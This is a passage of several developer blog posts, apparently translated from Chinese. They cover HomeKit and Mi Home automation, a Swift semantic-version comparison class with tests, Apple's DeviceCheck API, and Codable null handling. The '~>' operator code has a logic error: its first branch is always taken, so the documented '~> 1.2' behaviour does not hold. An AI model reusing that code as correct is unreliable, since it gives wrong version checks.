And it also supports color and brightness adjustment!
After adding and bridging everything, open the “Home” APP again.
Follow the steps to add a scene scenario, here using “Going Home” as an example:
Click the “+” in the upper right corner -> Add Scenario -> Custom -> Enter the accessory name yourself (EX: Going Home) -> Click “Add Accessory” at the bottom -> Select the HomeKit accessories that have been connected -> Set the accessory status for this scene (Camera: Off / Desk Lamp: On) -> You can click “Test Scenario” to test -> Click “Done” in the upper right corner!
Now the scene is set! At this point, clicking the scene on the homepage will execute the settings for all the accessories inside!
There is also a quick tip, which is to directly click the house-shaped button in the pull-up control menu to quickly operate HomeKit/execute scenarios (you can switch modes in the upper right corner)!
Now that we have the intelligence, I want to achieve the ultimate goal: automatically turn off the camera and turn on the lights when I get home; automatically turn on the camera and turn off the lights when I leave home.
Switch to the third tab “Automation” to set it up. Unfortunately, I don’t have any of the aforementioned devices (iPad/Apple TV/HomePod) to act as a “Home Hub“, so I haven’t researched this part.
The principle seems to be that when you get home, the “Home Hub” detects your phone/watch and triggers it accurately!
By using a third-party app to connect to “Home” and add automation settings, you can use your phone’s GPS to achieve automation and unlock the “Automation” tab’s functionality.
p.s. GPS has an error margin of about 100 meters.
The third-party app I used is: myHome Plus
Download & install the app -> Open the app -> Allow access to “Home Data” -> You will see the data configuration of “Home” -> Click the “Settings button” in the upper right corner -> Click “My Home” to enter -> Scroll down to the “Triggers” area -> Click “Add Trigger”
Select “Location” as the trigger type -> Enter a name (EX: Going Home) -> Click “Set Location” to set the location area -> Then in REGION STATUS, you can set whether to enter or leave the area -> Finally, in SCENES, you can choose the corresponding “scenario” to execute (created above).
After clicking “Done” in the upper right corner to save, go back to the “Home” app, and you will see that the “Automation” tab is now available!
At this point, you can click the “+” in the upper right corner to directly add automation scripts using the “Home” app!
The steps are similar to the third-party app, but with better integration! After creating the automation using the native “Home” app, you can also swipe to delete the one created with the third-party app.
!! Just note that you need to keep at least one; otherwise, the tab will revert to its original locked state!!
Siri Voice Control:
Compared to the Mi Home introduced below, HomeKit has a high level of integration and can directly use voice control for the set accessories and execute scenes without additional settings.
This concludes the introduction to HomeKit settings. Next, let’s explain how to use Mi Home’s native smart home features.
Here I encountered a confusing point: I couldn’t find the same Mi Home desk lamp in the list of new devices in Mi Home. The answer is:
Just look at the text, this is it
Other devices: For the camera and Pro desk lamp, just follow the official instructions to add them, no need to elaborate here.
Scene Scenario Settings:
Similar to the “Home” setup -> Switch to the “Smart” tab -> Select “Manual Execution” -> Choose device operation at the bottom (since it’s native, you can choose more functions) -> Continue to add other devices (desk lamp) -> Click “Save” to complete!
Someone might ask why not just choose “leave or arrive at a place”? Because that function is nearly useless: the app’s positioning is not adapted for Taiwan (the GPS mapping is off), and locations can only be set on landmarks. If your location happens to be one of those landmarks, you can use that function directly and skip the rest of the article!
For the quick switch part, you can set the widget from “My” -> “Widgets”!
This way, you can quickly execute scenes and devices from the notification center!
You can also control the widget from Apple Watch! *If the watch app keeps showing blank, please delete and reinstall the watch or phone app. This app has quite a few bugs.
Here, we still need to use the GPS sensing method. If the scene added above is “leave or arrive at a place”, you can skip the following settings!
* * * * *
iOS ≥ 13.1 Use the “Shortcuts” automation feature with Mi Home smart home, click to view»
* * * * *
iOS ≥ 12, iOS < 13 Only:
Use the built-in Shortcuts app with IFTTT
First, go to “My” -> “Experimental Features” -> “iOS Shortcuts” -> “Add Mi Home scenes to Shortcuts”
Open the system-built “ Shortcuts “ app (if you can’t find it, please search and download it from the App Store)
Click the “+” in the upper right corner to create a shortcut -> Click the settings button below the upper right corner -> Name -> Enter a name (it is recommended to use English, because you will use it later)
Return to the new shortcut page -> Enter “Mi Home” in the search menu below -> Add the corresponding scene set in Mi Home, and turn off “Show When Run” otherwise it will open the Mi Home app after execution.
*If you can’t find Mi Home, please go back to the Mi Home app and try to toggle “My” -> “Experimental Features” -> “iOS Shortcuts” -> “Add Mi Home scenes to Shortcuts”, and restart the “Shortcuts” app.
At this time, we need to use a third-party app again. We use IFTTT to create a GPS entry and exit background trigger. Search for “ IFTTT “ in the App Store to download and install.
Open IFTTT, log in to your account, switch to the “My Applets” tab, click the “+” in the upper right corner to add -> Click “+this” -> Search for “Location” -> Choose whether to enter or leave
Set the location -> Click “Create trigger” to confirm -> Then click “+that” below -> Search for “notification”
Choose “Send a rich notification from the IFTTT app”:
Title = Notification title, Message = Notification content
Link URL, please enter: shortcuts://run-shortcut?name= Shortcut name
So it’s recommended to set the shortcut name in English
-> Click “Create action” -> You can click “Edit title” to set the name
-> “Finish” save completed!
You will receive a triggered notification the next time you leave/enter the set area range (with an error range of about 100 meters). Clicking the notification will automatically execute the Mi Home scene!
Clicking the notification will automatically execute the scene in the background
For Siri voice control:
Since Mi Home is not an Apple built-in app, you need to set it up separately to support Siri voice control:
In the “Smart” Tab -> “Add to Siri” -> Select “Target Scene” and click “Add to Siri”
-> Click the red record command (EX: turn off the light) -> Done!
You can directly call and control the scene execution in Siri!
To summarize the above setup steps:
For a good experience, you need to spend a lot of money to buy appliances with the HomeKit logo (so you don’t need to keep a Mac running HomeBridge, and it integrates perfectly with the native Apple Home function). You also need to buy a HomePod or Apple TV, or iPad as the home hub; both HomeKit appliances and home hubs are not cheap!
If you have technical skills, you can consider using third-party smart devices (such as Mi Home) with a Raspberry Pi to run HomeBridge.
If you are an ordinary person like me, it is still most convenient to use Mi Home directly. Currently, my usage habit is to execute scene operations from the notification center shortcut widget when coming home or leaving home; the Shortcuts app with IFTTT is only used for notification reminders, in case I forget sometimes.
Although the current experience has not reached the ideal goal, it has already taken a step closer to a “smart home”!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Version number rules and comparison solutions
Photo by James Yarema
Every iOS app developer encounters two numbers: the Version Number and the Build Number. I recently had a version-number requirement (prompting users to rate the app) and took the opportunity to dig into version numbers; at the end of the article I also share my solution for comparing them.
First, let’s introduce the “Semantic Versioning” specification, which mainly addresses software dependency and management issues, for example with CocoaPods. Suppose I use Moya 4.0 today, and Moya 4.0 depends on Alamofire 2.0.0. If Alamofire releases an update, it could be a new feature, a bug fix, or a complete overhaul that breaks the old version; without a common consensus on version numbers it would be chaos, because you would not know which versions are compatible and safe to update to.
Semantic versioning consists of three parts: x.y.z
General rules:
Comparison method:
First compare the major version, if the major version is equal, then compare the minor version, if the minor version is equal, then compare the patch version.
ex: 1.0.0 < 2.0.0 < 2.1.0 < 2.1.1
Additionally, you can add “pre-release version information (ex: 1.0.1-alpha)” or “build metadata (ex: 1.0.0-alpha+001)” after the patch version, but iOS APP version numbers do not allow these formats to be uploaded to the App Store, so they will not be elaborated here. For details, refer to “ Semantic Versioning “.
✅: 1.0.1, 1.0.0, 5.6.7 ❌: 01.5.6, a1.2.3, 2.005.6
Regarding practical use in iOS app version control: since we only use it to mark released app versions and there are no dependency issues with other apps or software, the exact usage is up to each team to define. The following is just my personal take:
Generally, the revision number is only changed for emergency fixes (Hot Fix), and under normal circumstances, it remains 0. If a new version is released, it can be reset to 0.
EX: First version release (1.0.0) -> Strengthen the first version’s features (1.1.0) -> Found an issue to fix (1.1.1) -> Found another issue (1.1.2) -> Continue to strengthen the first version’s features (1.2.0) -> Major update (2.0.0) -> Found an issue to fix (2.0.1) … and so on
CFBundleShortVersionString
It is generally customary to use semantic versioning x.y.z or x.y.
CFBundleVersion
It is generally customary to use dates, numbers (starting from 0 for each new version), and use CI/fastlane to automatically increment the build number during packaging.
A brief survey of the version number formats of apps on the leaderboard, as shown in the image above.
Generally, x.y.z is still the main format.
Sometimes we need to use version numbers for judgment, for example: force update if below x.y.z version, prompt for rating if equal to a certain version. In such cases, we need a function to compare two version strings.
let version = "1.0.0"
+print(version.compare("1.0.0", options: .numeric) == .orderedSame) // true 1.0.0 = 1.0.0
+print(version.compare("1.22.0", options: .numeric) == .orderedAscending) // true 1.0.0 < 1.22.0
+print(version.compare("0.0.9", options: .numeric) == .orderedDescending) // true 1.0.0 > 0.0.9
+print(version.compare("2", options: .numeric) == .orderedAscending) // true 1.0.0 < 2
+
You can also write a String Extension:
extension String {
+ func versionCompare(_ otherVersion: String) -> ComparisonResult {
+ return self.compare(otherVersion, options: .numeric)
+ }
+}
+
⚠️ However, note that if the formats are different, the judgment will be incorrect:
let version = "1.0.0"
+version.compare("1", options: .numeric) //.orderedDescending
+
In reality we know 1 == 1.0.0, but this method returns .orderedDescending; you can refer to this article for zero-padding before comparing. Under normal circumstances, once we decide on an app version format it should not change: if using x.y.z, stick with x.y.z; do not switch between x.y.z and x.y.
You can directly use the existing wheel: mrackwitz/Version. Below is my recreation of that wheel.
The more elaborate approach here follows semantic versioning x.y.z as the format specification, uses a Regex for string parsing, and implements the comparison operators ourselves. In addition to the basic =/>/≥/</≤, we also implement the ~> operator (the same as the CocoaPods version specifier) and support string input with the operator included.
The definition of the ~> operator is:
greater than or equal to the given version, but less than the version obtained by bumping the next-higher component by 1.
EX:
+~> 1.2.1: (1.2.1 <= version < 1.3) 1.2.3,1.2.4...
+~> 1.2: (1.2 <= version < 2) 1.3,1.4,1.5,1.3.2,1.4.1...
+~> 1: (1 <= version < 2) 1.1.2,1.2.3,1.5.9,1.9.0...
+
@objcMembers
+class Version: NSObject {
+ private(set) var major: Int
+ private(set) var minor: Int
+ private(set) var patch: Int
+
+ override var description: String {
+ return "\(self.major),\(self.minor),\(self.patch)"
+ }
+
+ init(_ major: Int, _ minor: Int, _ patch: Int) {
+ self.major = major
+ self.minor = minor
+ self.patch = patch
+ }
+
+ init(_ string: String) throws {
+ let result = try Version.parse(string: string)
+ self.major = result.version.major
+ self.minor = result.version.minor
+ self.patch = result.version.patch
+ }
+
+ static func parse(string: String) throws -> VersionParseResult {
+ let regex = "^(?:(>=|>|<=|<|~>|=|!=){1}\\s*)?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)$"
+ let result = string.groupInMatches(regex)
+
+ if result.count == 4 {
+ //start with operator...
+ let versionOperator = VersionOperator(string: result[0])
+ guard versionOperator != .unSupported else {
+ throw VersionUnSupported()
+ }
+ let major = Int(result[1]) ?? 0
+ let minor = Int(result[2]) ?? 0
+ let patch = Int(result[3]) ?? 0
+ return VersionParseResult(versionOperator, Version(major, minor, patch))
+ } else if result.count == 3 {
+ //unSpecified operator...
+ let major = Int(result[0]) ?? 0
+ let minor = Int(result[1]) ?? 0
+ let patch = Int(result[2]) ?? 0
+ return VersionParseResult(.unSpecified, Version(major, minor, patch))
+ } else {
+ throw VersionUnSupported()
+ }
+ }
+}
+
+//Supported Objects
+@objc class VersionUnSupported: NSObject, Error { }
+
+@objc enum VersionOperator: Int {
+ case equal
+ case notEqual
+ case higherThan
+ case lowerThan
+ case lowerThanOrEqual
+ case higherThanOrEqual
+ case optimistic
+
+ case unSpecified
+ case unSupported
+
+ init(string: String) {
+ switch string {
+ case ">":
+ self = .higherThan
+ case "<":
+ self = .lowerThan
+ case "<=":
+ self = .lowerThanOrEqual
+ case ">=":
+ self = .higherThanOrEqual
+ case "~>":
+ self = .optimistic
+ case "=":
+ self = .equal
+ case "!=":
+ self = .notEqual
+ default:
+ self = .unSupported
+ }
+ }
+}
+
+@objcMembers
+class VersionParseResult: NSObject {
+ var versionOperator: VersionOperator
+ var version: Version
+ init(_ versionOperator: VersionOperator, _ version: Version) {
+ self.versionOperator = versionOperator
+ self.version = version
+ }
+}
+
You can see that Version stores major, minor, and patch, and the parse method is static so it can be called from outside. It accepts formats like 1.0.0 or ≥ 1.0.1, which makes it convenient for parsing strings and configuration files.
Input: 1.0.0 => Output: .unSpecified, Version(1.0.0)
+Input: ≥ 1.0.1 => Output: .higherThanOrEqual, Version(1.0.1)
+
The Regex is modified based on the Regex provided in the “Semantic Versioning Specification”:
^(0|[1-9]\d*)\.(0|[1-9]\d*)\.(0|[1-9]\d*)(?:-((?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+([0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$
+
*Considering the project is mixed with Objective-C, it should be usable in OC as well, so everything is declared as @objcMembers, and compromises are made to use OC-compatible syntax.
(Actually, you can directly use VersionOperator with enum: String, and Result with tuple/struct)
*If the implemented object is derived from NSObject, remember to implement != when implementing Comparable/Equatable ==, as the original NSObject’s != operation will not yield the expected result.
2. Implement Comparable methods:
extension Version: Comparable {
+ static func < (lhs: Version, rhs: Version) -> Bool {
+ if lhs.major < rhs.major {
+ return true
+ } else if lhs.major == rhs.major {
+ if lhs.minor < rhs.minor {
+ return true
+ } else if lhs.minor == rhs.minor {
+ if lhs.patch < rhs.patch {
+ return true
+ }
+ }
+ }
+
+ return false
+ }
+
+ static func == (lhs: Version, rhs: Version) -> Bool {
+ return lhs.major == rhs.major && lhs.minor == rhs.minor && lhs.patch == rhs.patch
+ }
+
+ static func != (lhs: Version, rhs: Version) -> Bool {
+ return !(lhs == rhs)
+ }
+
+ static func ~> (lhs: Version, rhs: Version) -> Bool {
+ let start = Version(lhs.major, lhs.minor, lhs.patch)
+ let end = Version(lhs.major, lhs.minor, lhs.patch)
+
+ if end.patch >= 0 {
+ end.minor += 1
+ end.patch = 0
+ } else if end.minor > 0 {
+ end.major += 1
+ end.minor = 0
+ } else {
+ end.major += 1
+ }
+ return start <= rhs && rhs < end
+ }
+
+ func compareWith(_ version: Version, operator: VersionOperator) -> Bool {
+ switch `operator` {
+ case .equal, .unSpecified:
+ return self == version
+ case .notEqual:
+ return self != version
+ case .higherThan:
+ return self > version
+ case .lowerThan:
+ return self < version
+ case .lowerThanOrEqual:
+ return self <= version
+ case .higherThanOrEqual:
+ return self >= version
+ case .optimistic:
+ return self ~> version
+ case .unSupported:
+ return false
+ }
+ }
+}
+
This simply implements the comparison logic described earlier, and finally exposes a compareWith method so callers can feed in the parse result and get the final verdict.
Usage Example:
let shouldAskUserFeedbackVersion = ">= 2.0.0"
+let currentVersion = "3.0.0"
+do {
+ let result = try Version.parse(string: shouldAskUserFeedbackVersion)
+ let current = try Version(currentVersion)
+ current.compareWith(result.version, operator: result.versionOperator) // true, 3.0.0 >= 2.0.0
+} catch {
+ print("version string parse error!")
+}
+
Or…
Version(1,0,0) >= Version(0,0,9) //true...
+
Supports the >/≥/</≤/=/!=/~> operators.
Test cases…
import XCTest

class VersionTests: XCTestCase {
    func testHigher() throws {
        let version = Version(3, 12, 1)
        XCTAssertEqual(version > Version(2, 100, 120), true)
        XCTAssertEqual(version > Version(3, 12, 0), true)
        XCTAssertEqual(version > Version(3, 10, 0), true)
        XCTAssertEqual(version >= Version(3, 12, 1), true)

        XCTAssertEqual(version > Version(3, 12, 1), false)
        XCTAssertEqual(version > Version(3, 12, 2), false)
        XCTAssertEqual(version > Version(4, 0, 0), false)
        XCTAssertEqual(version > Version(3, 13, 1), false)
    }

    func testLower() throws {
        let version = Version(3, 12, 1)
        XCTAssertEqual(version < Version(2, 100, 120), false)
        XCTAssertEqual(version < Version(3, 12, 0), false)
        XCTAssertEqual(version < Version(3, 10, 0), false)
        XCTAssertEqual(version <= Version(3, 12, 1), true)

        XCTAssertEqual(version < Version(3, 12, 1), false)
        XCTAssertEqual(version < Version(3, 12, 2), true)
        XCTAssertEqual(version < Version(4, 0, 0), true)
        XCTAssertEqual(version < Version(3, 13, 1), true)
    }

    func testEqual() throws {
        let version = Version(3, 12, 1)
        XCTAssertEqual(version == Version(3, 12, 1), true)
        XCTAssertEqual(version == Version(3, 12, 21), false)
        XCTAssertEqual(version != Version(3, 12, 1), false)
        XCTAssertEqual(version != Version(3, 12, 2), true)
    }

    func testOptimistic() throws {
        let version = Version(3, 12, 1)
        XCTAssertEqual(version ~> Version(3, 12, 1), true) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(3, 12, 9), true) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(3, 13, 0), false) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(3, 11, 1), false) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(3, 13, 1), false) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(2, 13, 0), false) //3.12.1 <= $0 < 3.13.0
        XCTAssertEqual(version ~> Version(3, 11, 100), false) //3.12.1 <= $0 < 3.13.0
    }

    func testVersionParse() throws {
        let unSpecifiedVersion = try? Version.parse(string: "1.2.3")
        XCTAssertNotNil(unSpecifiedVersion)
        XCTAssertEqual(unSpecifiedVersion!.version == Version(1, 2, 3), true)
        XCTAssertEqual(unSpecifiedVersion!.versionOperator, .unSpecified)

        let optimisticVersion = try? Version.parse(string: "~> 1.2.3")
        XCTAssertNotNil(optimisticVersion)
        XCTAssertEqual(optimisticVersion!.version == Version(1, 2, 3), true)
        XCTAssertEqual(optimisticVersion!.versionOperator, .optimistic)

        let higherThanVersion = try? Version.parse(string: "> 1.2.3")
        XCTAssertNotNil(higherThanVersion)
        XCTAssertEqual(higherThanVersion!.version == Version(1, 2, 3), true)
        XCTAssertEqual(higherThanVersion!.versionOperator, .higherThan)

        XCTAssertThrowsError(try Version.parse(string: "!! 1.2.3")) { error in
            XCTAssertEqual(error is VersionUnSupported, true)
        }
    }
}
Currently I'm planning to further optimize Version, add performance tests, and organize it into a package, then walk through the process of publishing my own CocoaPod.
However, there are already very complete version-handling Pod projects, so there is no need to reinvent the wheel; I just want to go through the release process once XD.
Maybe I will also submit a PR to the existing wheel to implement ~>.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
iOS DeviceCheck follows you everywhere
While writing the previous Call Directory Extension, I accidentally discovered this obscure API. Although it’s not something new (announced at WWDC 2017/iOS ≥11 support) and the implementation is very simple, I still did a little research and testing and organized this article as a record.
Allows developers to identify and mark the user’s device
Since iOS ≥ 6, developers cannot obtain the unique identifier (UUID) of the user’s device. The compromise is to use IDFV combined with KeyChain (for details, refer to this article), but in situations like changing iCloud accounts or resetting the phone, the UUID will still reset. It cannot guarantee the uniqueness of the device. If used for storing and judging some business logic, such as the first free trial, users might exploit the loophole by constantly changing accounts or resetting the phone to get unlimited trials.
Although DeviceCheck cannot provide a UUID that will never change, it can “store” information. Each device is given 2 bits of cloud storage space by Apple. By sending a temporary identification token generated by the device to Apple, you can write/read the 2 bits of information.
Only four states can be combined, so the functionality is limited.
✓ Indicates data is still there
p.s. I sacrificed my own phone for actual testing, and the results matched. Even if I logged out and changed iCloud, cleared all data, restored all settings, and returned to the factory initial state, I could still retrieve the value after reinstalling the app.
The iOS app generates a temporary token for device identification through the DeviceCheck API, sends it to the backend, which then combines the developer’s private key information and developer information into JWT format and sends it to the Apple server. The backend processes the result returned by Apple and sends it back to the iOS app.
Here is a screenshot of DeviceCheck from WWDC2017:
Since each device can only store 2 bits of information, the possible applications are limited to the ones Apple officially suggests, such as marking whether the device has already used a trial, has paid, or has been blacklisted, and in practice you can only implement one of these at a time.
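For example, a purely illustrative sketch of how an app might map the four possible bit combinations to its own states (the state names below are made up for this sketch; Apple's API only exposes the raw bit0/bit1 values):

// Purely illustrative: map the 2 DeviceCheck bits to app-defined states.
enum DeviceState {
    case new            // bit0 = 0, bit1 = 0
    case trialUsed      // bit0 = 1, bit1 = 0
    case paid           // bit0 = 0, bit1 = 1
    case blacklisted    // bit0 = 1, bit1 = 1

    init(bit0: Bool, bit1: Bool) {
        switch (bit0, bit1) {
        case (false, false): self = .new
        case (true, false): self = .trialUsed
        case (false, true): self = .paid
        case (true, true): self = .blacklisted
        }
    }

    // Bits to write back via update_two_bits.
    var bits: (bit0: Bool, bit1: Bool) {
        switch self {
        case .new: return (false, false)
        case .trialUsed: return (true, false)
        case .paid: return (false, true)
        case .blacklisted: return (true, true)
        }
    }
}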
Support: iOS ≥ 11
After understanding the basic information, let’s get started!
import DeviceCheck
//....
//
DCDevice.current.generateToken { dataOrNil, errorOrNil in
    guard let data = dataOrNil else { return }
    let deviceToken = data.base64EncodedString()

    //...
    //POST deviceToken to the backend, let the backend query the Apple server, and then return the result to the app for processing
}
As described in the process, the app only needs to obtain the temporary identification token (deviceToken)!
Next, send the deviceToken to our backend API for processing.
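As a minimal sketch of that hand-off (the https://your.backend/devicecheck URL and the JSON body shape are hypothetical placeholders for whatever your backend actually expects):

import Foundation

// Forward the temporary deviceToken to your own backend; the backend then talks to Apple.
func sendToBackend(deviceToken: String) {
    var request = URLRequest(url: URL(string: "https://your.backend/devicecheck")!) // hypothetical endpoint
    request.httpMethod = "POST"
    request.addValue("application/json", forHTTPHeaderField: "Content-Type")
    request.httpBody = try? JSONSerialization.data(withJSONObject: ["device_token": deviceToken])

    URLSession.shared.dataTask(with: request) { data, response, error in
        // Handle whatever result your backend returns after querying Apple.
    }.resume()
}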
The key part is the backend processing
Select “Keys” -> “All” -> Top right corner “+”
Step 1. Create a new Key, check “DeviceCheck”
Step 2. “Confirm”
Finished.
After completing the last step, note down the Key ID and click “Download” to download the privateKey.p8 private key file.
At this point, just like with push notification auth keys, you have all the information needed to generate the JWT:
Algorithm: ES256
//HEADER:
{
    "alg": "ES256",
    "kid": Key ID
}
//PAYLOAD:
{
    "iss": Team ID,
    "iat": request timestamp (Unix Timestamp, EX: 1556549164),
    "exp": expiration timestamp (Unix Timestamp, EX: 1557000000)
}
//Timestamps must be in integer format!
Get the combined JWT string: xxxxxx.xxxxxx.xxxxxx
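As a rough sketch of this signing step in Swift, using the CupertinoJWT package that also appears in the full demo further below (the key ID, team ID, and .p8 contents here are placeholders):

import Foundation
import CupertinoJWT

// Placeholders: fill in the values from your developer account.
let p8PrivateKey = """
-----BEGIN PRIVATE KEY-----
-----END PRIVATE KEY-----
"""
let keyID = "YOUR_KEY_ID"   // the Key ID noted when creating the DeviceCheck key
let teamID = "YOUR_TEAM_ID" // your developer Team ID

// Header: alg = ES256, kid = keyID; Payload: iss = teamID, iat = now, exp = now + 1 hour.
let jwt = JWT(keyID: keyID, teamID: teamID, issueDate: Date(), expireDuration: 60 * 60)

do {
    let token = try jwt.sign(with: p8PrivateKey) // "xxxxxx.xxxxxx.xxxxxx"
    print(token)
} catch {
    print("JWT signing failed: \(error)")
}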
Like APNS push notifications, there are separate environments for development and production:
DeviceCheck API provides two operations: 1. Query stored data: https://api.devicecheck.apple.com/v1/query_two_bits
//Headers:
Authorization: Bearer xxxxxx.xxxxxx.xxxxxx (combined JWT string)

//Content:
device_token: deviceToken (the device token to query)
transaction_id: UUID().uuidString (query identifier, using UUID here)
timestamp: request timestamp (milliseconds), note! This is in milliseconds (EX: 1556549164000)
Return status:
Return Content:
{
    "bit0": Int: The first bit of the 2 bits data: 0 or 1,
    "bit1": Int: The second bit of the 2 bits data: 0 or 1,
    "last_update_time": String: "Last update time YYYY-MM"
}
p.s. You read it right, the last update time can only be displayed up to year-month
2. Write Storage Data: https://api.devicecheck.apple.com/v1/update_two_bits
//Headers:
Authorization: Bearer xxxxxx.xxxxxx.xxxxxx (combined JWT string)

//Content:
device_token: deviceToken (Device Token to query)
transaction_id: UUID().uuidString (Query identifier, here directly represented by UUID)
timestamp: Request timestamp (milliseconds), note! This is in milliseconds (EX: 1556549164000)
bit0: The first bit of the 2 bits data: 0 or 1
bit1: The second bit of the 2 bits data: 0 or 1
Return Status:
Return Content: None, return status 200 indicates a successful write!
The APP responds to the corresponding status and it’s done!
It’s been a long time since I touched PHP, if interested, please refer to iOS11で追加されたDeviceCheckについて for the requestToken.php part
Since I can’t provide backend implementation and not everyone knows PHP, here is a pure iOS (Swift) example that handles backend tasks (generating JWT, sending data to Apple) directly in the APP for reference!
You can simulate all content without writing backend code.
⚠ Please note for testing and demonstration purposes only, not recommended for production environment ⚠
Special thanks to Ethan Huang for providing CupertinoJWT which supports generating JWT content within the iOS APP!
Main Demo Code and Interface:
import UIKit
import DeviceCheck
import CupertinoJWT

extension String {
    var queryEncode: String {
        return self.addingPercentEncoding(withAllowedCharacters: .whitespacesAndNewlines)?.replacingOccurrences(of: "+", with: "%2B") ?? ""
    }
}
class ViewController: UIViewController {

    @IBOutlet weak var getBtn: UIButton!
    @IBOutlet weak var statusBtn: UIButton!
    @IBAction func getBtnClick(_ sender: Any) {
        DCDevice.current.generateToken { dataOrNil, errorOrNil in
            guard let data = dataOrNil else { return }

            let deviceToken = data.base64EncodedString()

            //In a real situation:
            //POST deviceToken to backend, let backend query Apple server, then return the result to the APP

            //!!!!!! The following is for testing and demonstration purposes only, not recommended for production environment!!!!!!
            //!!!!!! Do not expose your PRIVATE KEY casually!!!!!!
            let p8 = """
            -----BEGIN PRIVATE KEY-----
            -----END PRIVATE KEY-----
            """
            let keyID = "" //Your KEY ID
            let teamID = "" //Your Developer Team ID: https://developer.apple.com/account/#/membership

            let jwt = JWT(keyID: keyID, teamID: teamID, issueDate: Date(), expireDuration: 60 * 60)

            do {
                let token = try jwt.sign(with: p8)
                var request = URLRequest(url: URL(string: "https://api.devicecheck.apple.com/v1/update_two_bits")!)
                request.httpMethod = "POST"
                request.addValue("Bearer \(token)", forHTTPHeaderField: "Authorization")
                request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
                let json: [String: Any] = ["device_token": deviceToken, "transaction_id": UUID().uuidString, "timestamp": Int(Date().timeIntervalSince1970.rounded()) * 1000, "bit0": true, "bit1": false]
                request.httpBody = try? JSONSerialization.data(withJSONObject: json)

                let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
                    guard let data = data else {
                        return
                    }
                    print(String(data: data, encoding: String.Encoding.utf8))
                    DispatchQueue.main.async {
                        self.getBtn.isHidden = true
                        self.statusBtn.isSelected = true
                    }
                }
                task.resume()
            } catch {
                // Handle error
            }
            //!!!!!! The above is for testing and demonstration purposes only, not recommended for production environment!!!!!!
            //
        }
    }

    override func viewDidLoad() {
        super.viewDidLoad()

        DCDevice.current.generateToken { dataOrNil, errorOrNil in
            guard let data = dataOrNil else { return }

            let deviceToken = data.base64EncodedString()

            //In a real situation:
            //POST deviceToken to backend, let backend query Apple server, then return the result to the APP

            //!!!!!! The following is for testing and demonstration purposes only, not recommended for production environment!!!!!!
            //!!!!!! Do not expose your PRIVATE KEY casually!!!!!!
            let p8 = """
            -----BEGIN PRIVATE KEY-----

            -----END PRIVATE KEY-----
            """
            let keyID = "" //Your KEY ID
            let teamID = "" //Your Developer Team ID: https://developer.apple.com/account/#/membership

            let jwt = JWT(keyID: keyID, teamID: teamID, issueDate: Date(), expireDuration: 60 * 60)

            do {
                let token = try jwt.sign(with: p8)
                var request = URLRequest(url: URL(string: "https://api.devicecheck.apple.com/v1/query_two_bits")!)
                request.httpMethod = "POST"
                request.addValue("Bearer \(token)", forHTTPHeaderField: "Authorization")
                request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
                let json: [String: Any] = ["device_token": deviceToken, "transaction_id": UUID().uuidString, "timestamp": Int(Date().timeIntervalSince1970.rounded()) * 1000]
                request.httpBody = try? JSONSerialization.data(withJSONObject: json)

                let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
                    guard let data = data, let json = try? JSONSerialization.jsonObject(with: data, options: .mutableContainers) as? [String: Any], let status = json["bit0"] as? Int else {
                        return
                    }
                    print(json)

                    if status == 1 {
                        DispatchQueue.main.async {
                            self.getBtn.isHidden = true
                            self.statusBtn.isSelected = true
                        }
                    }
                }
                task.resume()
            } catch {
                // Handle error
            }
            //!!!!!! The above is for testing and demonstration purposes only, not recommended for production environment!!!!!!
            //
        }
        // Do any additional setup after loading the view.
    }
}
Screenshot
This is a one-time discount claim, each device can only claim once!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Handling Response Null Fields Reasonably, No Need to Always Rewrite init decoder
Photo by Zan
Following the previous article “Real-World Codable Decoding Issues”, as development progresses, new scenarios and problems have emerged. Hence, this part continues to document the encountered situations and research insights for future reference.
The previous part mainly solved the JSON String -> Entity Object Decodable Mapping. Once we have the Entity Object, we can convert it into a Model Object for use within the program, View Model Object for handling data display logic, etc. On the other hand, we need to convert the Entity into NSManagedObject to store it in local Core Data.
Assume our song Entity structure is as follows:
struct Song: Decodable {
    var id: Int
    var name: String?
    var file: String?
    var coverImage: String?
    var likeCount: Int?
    var like: Bool?
    var length: Int?
}
Since the API EndPoint may not always return complete data fields (only id is guaranteed), all fields except id are Optional. For example, when fetching song information, a complete structure is returned, but when liking a song, only the id, likeCount, and like fields related to the change are returned.
We hope that whatever fields the API Response contains can be stored in Core Data. If the data already exists, update the changed fields (incremental update).
But here lies the problem: After Codable Decoding into an Entity Object, we cannot distinguish between “the data field is intended to be set to nil” and “the Response did not provide it”
A Response:
{
    "id": 1,
    "file": null
}

B Response (updates other fields, file not provided):
{
    "id": 1,
    "likeCount": 10,
    "like": true
}
For both A Response and B Response, the decoded file ends up nil, but the meanings are different; A intends to set the file field to null (clear the original data), while B intends to update other data and simply did not provide the file field.
A developer in the Swift community proposed adding a null Strategy similar to date Strategy in JSONDecoder, allowing us to distinguish the above situations, but there are currently no plans to include it.
As mentioned earlier, our architecture is JSON String -> Entity Object -> NSManagedObject, so when we get the Entity Object, it is already the result after decoding, and there is no raw data to operate on; of course, we can use the original JSON String for comparison, but it would be better not to use Codable in that case.
First, refer to the previous article to use Associated Value Enum as a container to hold values.
enum OptionalValue<T: Decodable>: Decodable {
    case null
    case value(T)
    init(from decoder: Decoder) throws {
        let container = try decoder.singleValueContainer()
        if let value = try? container.decode(T.self) {
            self = .value(value)
        } else {
            self = .null
        }
    }
}
Using generics, T is the actual data field type; .value(T) can hold the decoded value, and .null represents that the value is null.
struct Song: Decodable {
    enum CodingKeys: String, CodingKey {
        case id
        case file
    }

    var id: Int
